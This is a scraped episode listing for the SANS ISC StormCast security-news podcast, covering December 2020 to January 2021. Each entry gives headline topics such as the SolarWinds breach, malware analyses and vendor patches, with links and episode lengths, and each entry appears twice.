ISC StormCast for Thursday, January 21st, 2021

SolarWinds Updates https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ https://blog.malwarebytes.com/malwarebytes-news/2021/01/malwarebytes-targeted-by-nation-state-actor-implicated-in-solarwinds-breach-evidence-suggests-abuse-of-privileged-access-to-microsoft-office-365-and-azure-environments/ Cisco Advisories https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj Evesdropping Vulnerabilities in Various WebRTC Based Video Conferencing Systems https://googleprojectzero.blogspot.com/2021/01/the-state-of-state-machines.html Oracle Business Intelligence Enterprise Edition XSS https://www.exploit-db.com/exploits/49444
1/21/20217 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, January 21st, 2021

SolarWinds Updates https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ https://blog.malwarebytes.com/malwarebytes-news/2021/01/malwarebytes-targeted-by-nation-state-actor-implicated-in-solarwinds-breach-evidence-suggests-abuse-of-privileged-access-to-microsoft-office-365-and-azure-environments/ Cisco Advisories https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj Evesdropping Vulnerabilities in Various WebRTC Based Video Conferencing Systems https://googleprojectzero.blogspot.com/2021/01/the-state-of-state-machines.html Oracle Business Intelligence Enterprise Edition XSS https://www.exploit-db.com/exploits/49444
1/21/20217 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, January 20th, 2021

Qakbot Activity Resumes After Holiday Break https://isc.sans.edu/forums/diary/Qakbot+activity+resumes+after+holiday+break/27008/ Multiple dnsmasq Vulnerabilities https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq_Technical-Whitepaper.pdf FreakOut Malware https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/ Kids Break Screensaver https://github.com/linuxmint/cinnamon-screensaver/issues/354
1/20/20215 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, January 20th, 2021

Qakbot Activity Resumes After Holiday Break https://isc.sans.edu/forums/diary/Qakbot+activity+resumes+after+holiday+break/27008/ Multiple dnsmasq Vulnerabilities https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq_Technical-Whitepaper.pdf FreakOut Malware https://blog.checkpoint.com/2021/01/19/linux-users-should-patch-now-to-block-new-freakout-malware-which-exploits-new-vulnerabilities/ Kids Break Screensaver https://github.com/linuxmint/cinnamon-screensaver/issues/354
1/20/20215 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, January 19th, 2021

Doc And RTF Malicious Document https://isc.sans.edu/forums/diary/Doc+RTF+Malicious+Document/26996/ Center for Internet Security Cisco NX-OS Benchmark https://www.cisecurity.org/cis-benchmarks/ Exploit for Shazam Geolocation Vulnerablity https://ash-king.co.uk/blog/Shazlocate-abusing-CVE-2019-8791-CVE-2019-8792 Voice Phishing and Internal Messaging Systems Used to Escalate Privileges https://www.ic3.gov/Media/News/2021/210115.pdf
1/19/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, January 19th, 2021

Doc And RTF Malicious Document https://isc.sans.edu/forums/diary/Doc+RTF+Malicious+Document/26996/ Center for Internet Security Cisco NX-OS Benchmark https://www.cisecurity.org/cis-benchmarks/ Exploit for Shazam Geolocation Vulnerablity https://ash-king.co.uk/blog/Shazlocate-abusing-CVE-2019-8791-CVE-2019-8792 Voice Phishing and Internal Messaging Systems Used to Escalate Privileges https://www.ic3.gov/Media/News/2021/210115.pdf
1/19/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, January 18th, 2021

Scans for DNS over HTTPs https://isc.sans.edu/forums/diary/Obfuscated+DNS+Queries/26992/ https://us-cert.cisa.gov/ncas/current-activity/2021/01/15/nsa-releases-guidance-encrypted-dns-enterprise-environments Netlogon Domain Controller Enforcement Mode Starting February 9th https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/ Apple Removing ContentFilterExclusionList https://www.patreon.com/posts/46179028
1/18/20215 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, January 18th, 2021

Scans for DNS over HTTPs https://isc.sans.edu/forums/diary/Obfuscated+DNS+Queries/26992/ https://us-cert.cisa.gov/ncas/current-activity/2021/01/15/nsa-releases-guidance-encrypted-dns-enterprise-environments Netlogon Domain Controller Enforcement Mode Starting February 9th https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/ Apple Removing ContentFilterExclusionList https://www.patreon.com/posts/46179028
1/18/20215 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, January 15th, 2021

Dynamically Analzying A Heavily Obfuscted Excel 4 Macro Malicious File https://isc.sans.edu/forums/diary/Dynamically+analyzing+a+heavily+obfuscated+Excel+4+macro+malicious+file/26986/ Odd Filename Corrupts NTFS Disks https://twitter.com/jonasLyk/status/1347900440000811010 Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x
1/15/20214 minutes, 52 seconds
Episode Artwork

ISC StormCast for Friday, January 15th, 2021

Dynamically Analzying A Heavily Obfuscted Excel 4 Macro Malicious File https://isc.sans.edu/forums/diary/Dynamically+analyzing+a+heavily+obfuscated+Excel+4+macro+malicious+file/26986/ Odd Filename Corrupts NTFS Disks https://twitter.com/jonasLyk/status/1347900440000811010 Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x
1/15/20214 minutes, 52 seconds
Episode Artwork

ISC StormCast for Thursday, January 14th, 2021

Hancitor Activity Resumes After a Holiday Break https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/ Intel Hardware-Enabled Ransomware Protections https://www.cybereason.com/blog/cybereason-and-intel-introduce-hardware-enabled-ransomware-protections-for-businesses Making Clouds Rain: RCE in Microsoft Office 365 https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html#fn:1 SAP Security Patch Day https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=564760476
1/14/20216 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, January 14th, 2021

Hancitor Activity Resumes After a Holiday Break https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/ Intel Hardware-Enabled Ransomware Protections https://www.cybereason.com/blog/cybereason-and-intel-introduce-hardware-enabled-ransomware-protections-for-businesses Making Clouds Rain: RCE in Microsoft Office 365 https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html#fn:1 SAP Security Patch Day https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=564760476
1/14/20216 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, January 13th, 2021

MSFT January 2021 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2021+Patch+Tuesday/26978/ Adobe Patches https://helpx.adobe.com/security.html MimeCast Cert Stolen https://www.mimecast.com/blog/important-update-from-mimecast/ Leaking Silhouettes of Cross-Origin Images https://blog.mozilla.org/attack-and-defense/2021/01/11/leaking-silhouettes-of-cross-origin-images/
1/13/20216 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, January 13th, 2021

MSFT January 2021 Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+January+2021+Patch+Tuesday/26978/ Adobe Patches https://helpx.adobe.com/security.html MimeCast Cert Stolen https://www.mimecast.com/blog/important-update-from-mimecast/ Leaking Silhouettes of Cross-Origin Images https://blog.mozilla.org/attack-and-defense/2021/01/11/leaking-silhouettes-of-cross-origin-images/
1/13/20216 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, January 12th, 2021

Using the NVD Database API Part 3/3 https://isc.sans.edu/forums/diary/Using+the+NVD+Database+and+API+to+Keep+Up+with+Vulnerabilities+and+Patches+Tool+Drop+CVEScan+Part+3+of+3/26974/ Sysinternals Update https://docs.microsoft.com/en-us/sysinternals/ Ubiquiti Breach https://www.bleepingcomputer.com/news/security/networking-giant-ubiquiti-alerts-customers-of-potential-data-breach/ Run-Only AppleScript Reversing https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
1/12/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, January 12th, 2021

Using the NVD Database API Part 3/3 https://isc.sans.edu/forums/diary/Using+the+NVD+Database+and+API+to+Keep+Up+with+Vulnerabilities+and+Patches+Tool+Drop+CVEScan+Part+3+of+3/26974/ Sysinternals Update https://docs.microsoft.com/en-us/sysinternals/ Ubiquiti Breach https://www.bleepingcomputer.com/news/security/networking-giant-ubiquiti-alerts-customers-of-potential-data-breach/ Run-Only AppleScript Reversing https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/
1/12/20215 minutes, 57 seconds
Episode Artwork

ISC StormCast for Monday, January 11th, 2021

Maldoc Strings Analysis https://isc.sans.edu/forums/diary/Maldoc+Strings+Analysis/26966/ CVSS Reliablity Survey https://user-surveys.cs.fau.de/index.php?r=survey/index&sid=248857 Fake Trump Video Malware https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/ SMS Phishing (Smishing) https://www.bbc.com/news/business-55563748 dnsren vulnerability https://www.exploit-db.com/exploits/49394
1/11/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, January 11th, 2021

Maldoc Strings Analysis https://isc.sans.edu/forums/diary/Maldoc+Strings+Analysis/26966/ CVSS Reliablity Survey https://user-surveys.cs.fau.de/index.php?r=survey/index&sid=248857 Fake Trump Video Malware https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/updated-qnode-rat-downloader-distributed-as-trump-video-scandal/ SMS Phishing (Smishing) https://www.bbc.com/news/business-55563748 dnsren vulnerability https://www.exploit-db.com/exploits/49394
1/11/20215 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, January 8th, 2021

Using the NIST Database and API to Keep Up with Vulnerabilities https://isc.sans.edu/forums/diary/Using+the+NIST+Database+and+API+to+Keep+Up+with+Vulnerabilities+and+Patches+Part+1+of+3/26958/ Titan Security Key https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf The Great Suspender Google Chrome Extension https://www.theregister.com/2021/01/07/great_suspender_malware/ Brian Nishida: Ubuntu Artifacts Generated by Gnome Desktop Environment https://www.sans.org/reading-room/whitepapers/forensics/ubuntu-artifacts-generated-gnome-desktop-environment-40035
1/8/202115 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, January 8th, 2021

Using the NIST Database and API to Keep Up with Vulnerabilities https://isc.sans.edu/forums/diary/Using+the+NIST+Database+and+API+to+Keep+Up+with+Vulnerabilities+and+Patches+Part+1+of+3/26958/ Titan Security Key https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf The Great Suspender Google Chrome Extension https://www.theregister.com/2021/01/07/great_suspender_malware/ Brian Nishida: Ubuntu Artifacts Generated by Gnome Desktop Environment https://www.sans.org/reading-room/whitepapers/forensics/ubuntu-artifacts-generated-gnome-desktop-environment-40035
1/8/202115 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, January 7th, 2021

Zyxel Exploitation Under Way https://isc.sans.edu/forums/diary/Scans+for+Zyxel+Backdoors+are+Commencing/26954/ Fortinet Patches https://www.fortiguard.com/psirt?date=01-2021 Foxit PhantomPDF Patches https://www.foxitsoftware.com/support/security-bulletins.html Firefox Android Updates https://www.mozilla.org/en-US/security/advisories/mfsa2021-01/
1/7/20214 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, January 7th, 2021

Zyxel Exploitation Under Way https://isc.sans.edu/forums/diary/Scans+for+Zyxel+Backdoors+are+Commencing/26954/ Fortinet Patches https://www.fortiguard.com/psirt?date=01-2021 Foxit PhantomPDF Patches https://www.foxitsoftware.com/support/security-bulletins.html Firefox Android Updates https://www.mozilla.org/en-US/security/advisories/mfsa2021-01/
1/7/20214 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, January 6th, 2021

Netfox Detective: An Alternative Open-Source Packet Analysis Tool https://isc.sans.edu/forums/diary/Netfox+Detective+An+Alternative+OpenSource+Packet+Analysis+Tool/26950/ ElectroRAT Drains Cryptocurrency Accounts https://www.intezer.com/blog/research/operation-ElectroRAT-attacker-creates-fake-companies-to-drain-your-crypto-wallets/ Chrome Will Prefer HTTPS over HTTP By Default https://chromium-review.googlesource.com/c/chromium/src/+/2568448 Android January Patch Day https://source.android.com/security/bulletin/2021-01-01 Telegram Publishes Users' Locations Online https://blog.ahmed.nyc/2021/01/if-you-use-this-feature-on-telegram.html
1/6/20215 minutes, 52 seconds
Episode Artwork

ISC StormCast for Wednesday, January 6th, 2021

Netfox Detective: An Alternative Open-Source Packet Analysis Tool https://isc.sans.edu/forums/diary/Netfox+Detective+An+Alternative+OpenSource+Packet+Analysis+Tool/26950/ ElectroRAT Drains Cryptocurrency Accounts https://www.intezer.com/blog/research/operation-ElectroRAT-attacker-creates-fake-companies-to-drain-your-crypto-wallets/ Chrome Will Prefer HTTPS over HTTP By Default https://chromium-review.googlesource.com/c/chromium/src/+/2568448 Android January Patch Day https://source.android.com/security/bulletin/2021-01-01 Telegram Publishes Users' Locations Online https://blog.ahmed.nyc/2021/01/if-you-use-this-feature-on-telegram.html
1/6/20215 minutes, 52 seconds
Episode Artwork

ISC StormCast for Tuesday, January 5th, 2021

From a Small BAT File to Mass Logger Infostealer https://isc.sans.edu/forums/diary/From+a+small+BAT+file+to+Mass+Logger+infostealer/26946/ Citrix Releases Updates Addressing DTLS Flaw https://support.citrix.com/article/CTX289674 Zend Framework Deserialization Flaw https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3007 https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20 %20rce.md
1/5/20215 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, January 5th, 2021

From a Small BAT File to Mass Logger Infostealer https://isc.sans.edu/forums/diary/From+a+small+BAT+file+to+Mass+Logger+infostealer/26946/ Citrix Releases Updates Addressing DTLS Flaw https://support.citrix.com/article/CTX289674 Zend Framework Deserialization Flaw https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3007 https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20 %20rce.md
1/5/20215 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, January 4th 2021

Traffic Analysis Quiz https://isc.sans.edu/forums/diary/End+of+Year+Traffic+Analysis+Quiz/26940/ Zyxel Backdoor https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html Microsoft Source Code Accessed As a Result of SolarWinds Backdoor https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/
1/4/20214 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, January 4th 2021

Traffic Analysis Quiz https://isc.sans.edu/forums/diary/End+of+Year+Traffic+Analysis+Quiz/26940/ Zyxel Backdoor https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html Microsoft Source Code Accessed As a Result of SolarWinds Backdoor https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/
1/4/20214 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, December 30th 2020

Accessing Restricted Directory Listings via Your AV Solution https://isc.sans.edu/forums/diary/Want+to+know+whats+in+a+folder+you+dont+have+a+permission+to+access+Try+asking+your+AV+solution/26932/ Coin Miner Malware Written in Go https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/?fbclid=IwAR3eFiHCNoqr5mc2UAOcm8nocjUOjZn0cpcAiSoYmn__JtJfBbjqUUT1OwQ AutoHotKey Credential Stealer https://www.trendmicro.com/en_us/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html
12/30/20204 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, December 30th 2020

Accessing Restricted Directory Listings via Your AV Solution https://isc.sans.edu/forums/diary/Want+to+know+whats+in+a+folder+you+dont+have+a+permission+to+access+Try+asking+your+AV+solution/26932/ Coin Miner Malware Written in Go https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/?fbclid=IwAR3eFiHCNoqr5mc2UAOcm8nocjUOjZn0cpcAiSoYmn__JtJfBbjqUUT1OwQ AutoHotKey Credential Stealer https://www.trendmicro.com/en_us/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html
12/30/20204 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, December 29th 2020

Extending Android Device Compatibility for Let's Encrypt Certificates https://letsencrypt.org/2020/12/21/extending-android-compatibility.html Insufficient Patch for Windows 8.1/10 Print Spooler https://bugs.chromium.org/p/project-zero/issues/detail?id=2096 Google Docs Vulnerability https://savebreach.com/stealing-private-documents-through-a-google-docs-bug/ CCC Conferences Virtual https://streaming.media.ccc.de/rc3
12/29/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, December 29th 2020

Extending Android Device Compatibility for Let's Encrypt Certificates https://letsencrypt.org/2020/12/21/extending-android-compatibility.html Insufficient Patch for Windows 8.1/10 Print Spooler https://bugs.chromium.org/p/project-zero/issues/detail?id=2096 Google Docs Vulnerability https://savebreach.com/stealing-private-documents-through-a-google-docs-bug/ CCC Conferences Virtual https://streaming.media.ccc.de/rc3
12/29/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, December 28th 2020

base64dump.py Supported Encodings https://isc.sans.edu/forums/diary/base64dumppy+Supported+Encodings/26924/ String Analysis and Maldocs https://isc.sans.edu/forums/diary/Quickie+String+Analysis+Maldocs/26922/ Malicious Word Document Delivering an Octopus Backdoor https://isc.sans.edu/forums/diary/Malicious+Word+Document+Delivering+an+Octopus+Backdoor/26918/ Analysis Dridex Dropper, IoC extraction https://isc.sans.edu/forums/diary/Analysis+Dridex+Dropper+IoC+extraction+guest+diary/26920/ AT&T Outage due to Nashville Explosion https://about.att.com/pages/disaster_relief/nashville.html SolarWinds SUPERNOVA Malware / API Vulnerability https://www.solarwinds.com/securityadvisory Citrix ADC DDoS Attack https://support.citrix.com/article/CTX289674 Crowdstrike Reporting Tool for Azure https://github.com/CrowdStrike/CRT
12/28/20205 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, December 28th 2020

base64dump.py Supported Encodings https://isc.sans.edu/forums/diary/base64dumppy+Supported+Encodings/26924/ String Analysis and Maldocs https://isc.sans.edu/forums/diary/Quickie+String+Analysis+Maldocs/26922/ Malicious Word Document Delivering an Octopus Backdoor https://isc.sans.edu/forums/diary/Malicious+Word+Document+Delivering+an+Octopus+Backdoor/26918/ Analysis Dridex Dropper, IoC extraction https://isc.sans.edu/forums/diary/Analysis+Dridex+Dropper+IoC+extraction+guest+diary/26920/ AT&T Outage due to Nashville Explosion https://about.att.com/pages/disaster_relief/nashville.html SolarWinds SUPERNOVA Malware / API Vulnerability https://www.solarwinds.com/securityadvisory Citrix ADC DDoS Attack https://support.citrix.com/article/CTX289674 Crowdstrike Reporting Tool for Azure https://github.com/CrowdStrike/CRT
12/28/20205 minutes, 35 seconds
Episode Artwork

ISC StormCast for Wednesday, December 23rd 2020

Malware Victim Selection Through WiFi Identification https://isc.sans.edu/forums/diary/Malware+Victim+Selection+Through+WiFi+Identification/26910/ New Treck IP Stack Vulnerabilities https://treck.com/vulnerability-response-information/ Detecting Treck IP Stack https://github.com/Forescout/project-memoria-detector
12/23/20203 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, December 23rd 2020

Malware Victim Selection Through WiFi Identification https://isc.sans.edu/forums/diary/Malware+Victim+Selection+Through+WiFi+Identification/26910/ New Treck IP Stack Vulnerabilities https://treck.com/vulnerability-response-information/ Detecting Treck IP Stack https://github.com/Forescout/project-memoria-detector
12/23/20203 minutes, 50 seconds
Episode Artwork

ISC StormCast for Tuesday, December 22nd 2020

What's The Deal With Openportstats.com? https://isc.sans.edu/forums/diary/Whats+the+deal+with+openportstatscom/26912/ Dell Wyse ThinOS 8.6 Security Update https://www.dell.com/support/kbdoc/en-hr/000180768/dsa-2020-281 SolarWinds 2nd Backdoor https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ SolarWinds Domains https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/
12/22/20206 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, December 22nd 2020

What's The Deal With Openportstats.com? https://isc.sans.edu/forums/diary/Whats+the+deal+with+openportstatscom/26912/ Dell Wyse ThinOS 8.6 Security Update https://www.dell.com/support/kbdoc/en-hr/000180768/dsa-2020-281 SolarWinds 2nd Backdoor https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ SolarWinds Domains https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/
12/22/20206 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, December 21st 2020

A slightly optimistic tale of how patching went for CVE-2019-19781 https://isc.sans.edu/forums/diary/A+slightly+optimistic+tale+of+how+patching+went+for+CVE201919781/26900/ Heads-up: VirusTotal Functionality in Sysinternals Tools Not Working https://isc.sans.edu/forums/diary/Headsup+VirusTotal+Functionality+in+Sysinternals+Tools+Not+Working/26906/ Kasachstan: Browsers Block Government Certificate Authority https://www.zdnet.com/article/apple-google-microsoft-and-mozilla-ban-kazakhstans-mitm-https-certificate/ 5G Vulnerabilities https://positive-tech.com/about/news/vulnerabilities-in-standalone-5g-networks-could-allow-attackers-to-steal-credentials-and-falsify-subscriber-authentication/ Bouncy Castle BCrypt Password Verification Error https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle/
12/21/20205 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, December 21st 2020

A slightly optimistic tale of how patching went for CVE-2019-19781 https://isc.sans.edu/forums/diary/A+slightly+optimistic+tale+of+how+patching+went+for+CVE201919781/26900/ Heads-up: VirusTotal Functionality in Sysinternals Tools Not Working https://isc.sans.edu/forums/diary/Headsup+VirusTotal+Functionality+in+Sysinternals+Tools+Not+Working/26906/ Kasachstan: Browsers Block Government Certificate Authority https://www.zdnet.com/article/apple-google-microsoft-and-mozilla-ban-kazakhstans-mitm-https-certificate/ 5G Vulnerabilities https://positive-tech.com/about/news/vulnerabilities-in-standalone-5g-networks-could-allow-attackers-to-steal-credentials-and-falsify-subscriber-authentication/ Bouncy Castle BCrypt Password Verification Error https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle/
12/21/20205 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, December 18th 2020

Token Authentication Requirements for Git Operations https://github.blog/2020-12-15-token-authentication-requirements-for-git-operations/ Google Attempting to Speed Up OS Update Adoption https://android-developers.googleblog.com/2020/12/treble-plus-one-equals-four.html Trend Micro InterScan Web Security Virtual Appliance Vulnerability https://success.trendmicro.com/solution/000283077 Malicios Browser Extensions https://blog.avast.com/malicious-browser-extensions-avast
12/18/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, December 18th 2020

Token Authentication Requirements for Git Operations https://github.blog/2020-12-15-token-authentication-requirements-for-git-operations/ Google Attempting to Speed Up OS Update Adoption https://android-developers.googleblog.com/2020/12/treble-plus-one-equals-four.html Trend Micro InterScan Web Security Virtual Appliance Vulnerability https://success.trendmicro.com/solution/000283077 Malicios Browser Extensions https://blog.avast.com/malicious-browser-extensions-avast
12/18/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, December 17th 2020

Cloud DNS Logs https://isc.sans.edu/forums/diary/DNS+Logs+in+Public+Clouds/26892/ Solarwinds Update https://www.heise.de/news/l-f-SolarWinds-Backdoor-Hersteller-sorgte-fuer-Ausnahmen-von-AV-Ueberwachung-4990910.html https://krebsonsecurity.com/2020/12/malicious-domain-in-solarwinds-hack-turned-into-killswitch/ Hewlett Packard Enterprise Systems Insight Manager (SIM) Vulnerability https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us SAP HANA SAML Validation Weakness https://www.secureauth.com/blog/secureauth-uncovers-saml-validation-weakness-in-sap-hana/
12/17/20206 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, December 17th 2020

Cloud DNS Logs https://isc.sans.edu/forums/diary/DNS+Logs+in+Public+Clouds/26892/ Solarwinds Update https://www.heise.de/news/l-f-SolarWinds-Backdoor-Hersteller-sorgte-fuer-Ausnahmen-von-AV-Ueberwachung-4990910.html https://krebsonsecurity.com/2020/12/malicious-domain-in-solarwinds-hack-turned-into-killswitch/ Hewlett Packard Enterprise Systems Insight Manager (SIM) Vulnerability https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbgn04068en_us SAP HANA SAML Validation Weakness https://www.secureauth.com/blog/secureauth-uncovers-saml-validation-weakness-in-sap-hana/
12/17/20206 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, December 16th 2020

Analyzing A Fireeye Maldoc https://isc.sans.edu/forums/diary/Analyzing+FireEye+Maldocs/26882/ Didier Stevens: 2020 Difference Makers https://www.sans.org/webcasts/2020-difference-makers-awards-ceremony-117154 F5 Big IP Vulnerabilities https://support.f5.com/csp/article/K20984059 https://support.f5.com/csp/article/K42696541 https://support.f5.com/csp/article/K37960100 Google Outage https://status.cloud.google.com/incident/zall/20013 GoLang XML Parser Vulnerabilities https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/
12/16/20206 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, December 16th 2020

Analyzing A Fireeye Maldoc https://isc.sans.edu/forums/diary/Analyzing+FireEye+Maldocs/26882/ Didier Stevens: 2020 Difference Makers https://www.sans.org/webcasts/2020-difference-makers-awards-ceremony-117154 F5 Big IP Vulnerabilities https://support.f5.com/csp/article/K20984059 https://support.f5.com/csp/article/K42696541 https://support.f5.com/csp/article/K37960100 Google Outage https://status.cloud.google.com/incident/zall/20013 GoLang XML Parser Vulnerabilities https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/
12/16/20206 minutes, 21 seconds
Episode Artwork

ISC StormCast for Tuesday, December 15th 2020

SolarWinds Followup https://isc.sans.edu/forums/diary/SolarWinds+Breach+Used+to+Infiltrate+Customer+Networks+Solarigate/26884/ https://sansurl.com/solarwinds Apple Updates Everything https://support.apple.com/en-us/HT201222 Sophos and Reversing Labs Release 20 Million Malware Samples https://github.com/sophos-ai/SOREL-20M
12/15/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, December 15th 2020

SolarWinds Followup https://isc.sans.edu/forums/diary/SolarWinds+Breach+Used+to+Infiltrate+Customer+Networks+Solarigate/26884/ https://sansurl.com/solarwinds Apple Updates Everything https://support.apple.com/en-us/HT201222 Sophos and Reversing Labs Release 20 Million Malware Samples https://github.com/sophos-ai/SOREL-20M
12/15/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, December 14th 2020

SolarWinds Compromise https://isc.sans.edu/forums/diary/SolarWinds+Breach+Used+to+Infiltrate+Customer+Networks+Solarigate/26884/ Writing Yara Rules for Fun and Profit: Notes form the FireEye Breach Countermeasures https://isc.sans.edu/forums/diary/Writing+Yara+Rules+for+Fun+and+Profit+Notes+from+the+FireEye+Breach+Countermeasures/26870/ Flash Player EoL https://helpx.adobe.com/flash-player/release-note/fp_32_air_32_release_notes.html Subway Marketing System Hacked to Send TrickBot Malware Emails https://www.bleepingcomputer.com/news/security/subway-marketing-system-hacked-to-send-trickbot-malware-emails/
12/14/20205 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, December 14th 2020

SolarWinds Compromise https://isc.sans.edu/forums/diary/SolarWinds+Breach+Used+to+Infiltrate+Customer+Networks+Solarigate/26884/ Writing Yara Rules for Fun and Profit: Notes form the FireEye Breach Countermeasures https://isc.sans.edu/forums/diary/Writing+Yara+Rules+for+Fun+and+Profit+Notes+from+the+FireEye+Breach+Countermeasures/26870/ Flash Player EoL https://helpx.adobe.com/flash-player/release-note/fp_32_air_32_release_notes.html Subway Marketing System Hacked to Send TrickBot Malware Emails https://www.bleepingcomputer.com/news/security/subway-marketing-system-hacked-to-send-trickbot-malware-emails/
12/14/20205 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 11th 2020

Python Backdoor Talking to a C2 Through Ngrok https://isc.sans.edu/forums/diary/Python+Backdoor+Talking+to+a+C2+Through+Ngrok/26866/ Cisco Releases Improved Patch for Jabber Vulnerabilities https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-ZktzjpgO https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/ SANS Holiday Hack Challenge https://holidayhackchallenge.com/2020/ Karim Lalji: Fear of the Unkown: A Metanalysis of Insecure Object Deserialization Vulnerabilities https://www.sans.org/reading-room/whitepapers/testing/fear-unknown-metanalysis-insecure-object-deserialization-vulnerabilities-39920
12/11/202013 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, December 11th 2020

